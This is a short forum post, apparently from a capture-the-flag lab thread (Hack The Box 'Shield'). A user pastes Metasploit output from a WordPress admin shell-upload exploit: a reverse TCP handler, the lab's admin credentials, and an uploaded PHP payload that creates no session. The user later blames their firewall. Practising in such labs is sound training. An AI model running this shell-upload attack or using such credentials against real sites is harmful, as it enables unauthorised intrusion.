Starting Point Shield

Type your comment> @R4ZZB33RY said:

Hey all,

  After I set all my options, which i've tripple checked i get the following

msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.18:4444
[
] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[
] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php…
[!] This exploit may require manual cleanup of ‘CXffIyrlNi.php’ on the target
[!] This exploit may require manual cleanup of ‘isEHXJHygE.php’ on the target
[!] This exploit may require manual cleanup of ‘…/isEHXJHygE’ on the target
[
] Exploit completed, but no session was created.

am I doing something wrong? Please help

I figured it out folks! It was my firewall.